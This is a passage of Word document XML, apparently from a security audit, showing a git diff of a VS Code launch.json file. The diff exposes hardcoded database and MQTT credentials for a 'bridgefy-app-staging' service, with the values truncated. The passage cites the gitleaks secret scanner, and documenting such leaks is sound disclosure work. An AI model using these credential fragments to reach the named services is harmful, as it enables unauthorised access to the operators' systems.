        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.vscode/launch.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.vscode/launch.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBUSER"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"adm[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBPASS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Dqn[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBNAME"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>staging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15750656">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1028700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>562973</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2146300" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="65" name="Graphic 65"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="65" name="Graphic 65"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2146300" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="2146300" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2146296" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="12699">
                          <a:solidFill>
                            <a:srgbClr val="1154C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50656" from="81pt,44.328636pt" to="249.99975pt,44.328636pt" stroked="true" strokeweight=".999998pt" strokecolor="#1154cc">
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="78"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487608832">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213519</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="66" name="Graphic 66"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="66" name="Graphic 66"/>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6.812550pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15707648;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape51" coordorigin="1440,336" coordsize="2880,0" path="m1440,336l4320,336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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId149">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/zricethezav/gitleaks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="4111" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15752192">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1790700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>906</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1773555" cy="594994"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="67" name="Textbox 67"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="67" name="Textbox 67"/>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1773555" cy="594994"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:jc w:val="left"/>
                              <w:tblCellSpacing w:w="15" w:type="dxa"/>
                              <w:tblInd w:w="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72"/>
                            </w:tblGrid>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTUSERNAME2"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"br1[...]"</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTPASSWORD2"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"br1[...]"</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTUSERNAME"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"mik[...]"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>,</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTPASSWORD"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"mik[...]"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>,</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape style="position:absolute;margin-left:141pt;margin-top:.071387pt;width:139.65pt;height:46.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15752192" type="#_x0000_t202" id="docshape52" filled="false" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:jc w:val="left"/>
                        <w:tblCellSpacing w:w="15" w:type="dxa"/>
                        <w:tblInd w:w="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72"/>
                      </w:tblGrid>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTUSERNAME2"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"br1[...]"</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTPASSWORD2"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"br1[...]"</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTUSERNAME"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"mik[...]"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTPASSWORD"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"mik[...]"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="none"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
